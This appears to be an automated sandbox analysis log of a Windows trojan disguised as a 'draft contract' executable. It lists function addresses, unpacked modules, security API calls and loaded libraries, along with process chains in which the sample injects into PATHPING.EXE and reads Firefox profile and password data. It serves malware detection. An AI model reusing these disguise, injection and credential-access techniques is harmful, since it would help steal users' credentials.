                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178EFA02_2_0178EFA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710E592_2_01710E59
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CEE262_2_017CEE26
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CEEDB2_2_017CEEDB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722E902_2_01722E90
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CCE932_2_017CCE93
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017DB16B2_2_017DB16B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174516C2_2_0174516C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FF1722_2_016FF172
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171B1B02_2_0171B1B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C70E92_2_017C70E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CF0E02_2_017CF0E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017170C02_2_017170C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BF0CC2_2_017BF0CC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FD34C2_2_016FD34C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C132D2_2_017C132D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0175739A2_2_0175739A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172D2F02_2_0172D2F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B12ED2_2_017B12ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172B2C02_2_0172B2C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017152A02_2_017152A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C75712_2_017C7571
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D95C32_2_017D95C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AD5B02_2_017AD5B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017014602_2_01701460
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CF43F2_2_017CF43F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CF7B02_2_017CF7B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017556302_2_01755630
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C16CC2_2_017C16CC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017199502_2_01719950
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172B9502_2_0172B950
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A59102_2_017A5910
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177D8002_2_0177D800
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017138E02_2_017138E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CFB762_2_017CFB76
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01785BF02_2_01785BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174DBF92_2_0174DBF9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172FB802_2_0172FB80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01783A6C2_2_01783A6C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CFA492_2_017CFA49
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C7A462_2_017C7A46
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BDAC62_2_017BDAC6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01755AA02_2_01755AA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017ADAAC2_2_017ADAAC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B1AA32_2_017B1AA3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C7D732_2_017C7D73
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C1D5A2_2_017C1D5A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01713D402_2_01713D40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172FDC02_2_0172FDC0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01789C322_2_01789C32
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CFCF22_2_017CFCF2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CFF092_2_017CFF09
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D3FD52_2_016D3FD5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D3FD22_2_016D3FD2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CFFB12_2_017CFFB1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01711F922_2_01711F92
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01719EB02_2_01719EB0
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325CE4D6_2_0325CE4D
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325EBF36_2_0325EBF3
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325EBFC6_2_0325EBFC
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0327D8EC6_2_0327D8EC
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325EE1C6_2_0325EE1C
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_032655276_2_03265527
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0326552C6_2_0326552C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370A3527_2_0370A352
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0365E3F07_2_0365E3F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037103E67_2_037103E6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F02747_2_036F0274
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036D02C07_2_036D02C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036D81587_2_036D8158
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036401007_2_03640100
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036EA1187_2_036EA118
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037081CC7_2_037081CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037041A27_2_037041A2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037101AA7_2_037101AA
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036E20007_2_036E2000
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036507707_2_03650770
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036747507_2_03674750
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0364C7C07_2_0364C7C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366C6E07_2_0366C6E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036505357_2_03650535
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037105917_2_03710591
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037024467_2_03702446
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F44207_2_036F4420
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036FE4F67_2_036FE4F6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370AB407_2_0370AB40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03706BD77_2_03706BD7
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0364EA807_2_0364EA80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036669627_2_03666962
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036529A07_2_036529A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0371A9A67_2_0371A9A6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036528407_2_03652840
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0365A8407_2_0365A840
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0367E8F07_2_0367E8F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036368B87_2_036368B8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036C4F407_2_036C4F40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03692F287_2_03692F28
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03670F307_2_03670F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F2F307_2_036F2F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03642FC87_2_03642FC8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036CEFA07_2_036CEFA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03650E597_2_03650E59
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370EE267_2_0370EE26
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370EEDB7_2_0370EEDB
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370CE937_2_0370CE93
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03662E907_2_03662E90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0365AD007_2_0365AD00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036ECD1F7_2_036ECD1F
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0364ADE07_2_0364ADE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03668DBF7_2_03668DBF
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03650C007_2_03650C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03640CF27_2_03640CF2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F0CB57_2_036F0CB5
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0363D34C7_2_0363D34C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370132D7_2_0370132D
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0369739A7_2_0369739A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F12ED7_2_036F12ED
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366D2F07_2_0366D2F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366B2C07_2_0366B2C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036552A07_2_036552A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0368516C7_2_0368516C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0363F1727_2_0363F172
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0371B16B7_2_0371B16B
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0365B1B07_2_0365B1B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370F0E07_2_0370F0E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037070E97_2_037070E9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036FF0CC7_2_036FF0CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036570C07_2_036570C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370F7B07_2_0370F7B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036956307_2_03695630
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037016CC7_2_037016CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037075717_2_03707571
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_037195C37_2_037195C3
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036ED5B07_2_036ED5B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036414607_2_03641460
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370F43F7_2_0370F43F
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370FB767_2_0370FB76
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0368DBF97_2_0368DBF9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036C5BF07_2_036C5BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366FB807_2_0366FB80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036C3A6C7_2_036C3A6C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03707A467_2_03707A46
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370FA497_2_0370FA49
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036FDAC67_2_036FDAC6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036EDAAC7_2_036EDAAC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03695AA07_2_03695AA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036F1AA37_2_036F1AA3
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036599507_2_03659950
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366B9507_2_0366B950
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036E59107_2_036E5910
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036BD8007_2_036BD800
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036538E07_2_036538E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370FF097_2_0370FF09
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03613FD27_2_03613FD2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03613FD57_2_03613FD5
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370FFB17_2_0370FFB1
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03651F927_2_03651F92
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03659EB07_2_03659EB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03707D737_2_03707D73
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03653D407_2_03653D40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03701D5A7_2_03701D5A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0366FDC07_2_0366FDC0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036C9C327_2_036C9C32
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0370FCF27_2_0370FCF2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB19207_2_02BB1920
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BACA907_2_02BACA90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BAAB107_2_02BAAB10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BAC8707_2_02BAC870
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BAC8677_2_02BAC867
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB4F607_2_02BB4F60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB31A07_2_02BB31A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB319B7_2_02BB319B
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BCB5607_2_02BCB560
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350E3447_2_0350E344
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350E2287_2_0350E228
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350D7A87_2_0350D7A8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350E6DC7_2_0350E6DC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350CA487_2_0350CA48
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0350C97B7_2_0350C97B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: String function: 01757E54 appears 107 times
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: String function: 016FB970 appears 262 times
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: String function: 0178F290 appears 103 times
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: String function: 01745130 appears 58 times
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: String function: 0177EA12 appears 86 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 03685130 appears 58 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 03697E54 appears 107 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 0363B970 appears 262 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 036BEA12 appears 86 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 036CF290 appears 103 times
                Source: draft contract for order #782334.exe, 00000000.00000002.1772436889.000000000BBA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000000.00000000.1657606206.0000000000DDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehmRI.exe: vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000000.00000002.1756323180.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepathping.exej% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000017FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepathping.exej% vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exeBinary or memory string: OriginalFilenamehmRI.exe: vs draft contract for order #782334.exe
                Source: draft contract for order #782334.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: draft contract for order #782334.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, HVj9taPB6orrMyXKMK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/11
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\draft contract for order #782334.exe.logJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile created: C:\Users\user\AppData\Local\Temp\6276I39Jump to behavior
                Source: draft contract for order #782334.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: draft contract for order #782334.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PATHPING.EXE, 00000007.00000003.2269109498.0000000003168000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2268237865.0000000003146000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4134882508.0000000003168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: draft contract for order #782334.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: sspicli.dllJump to behavior
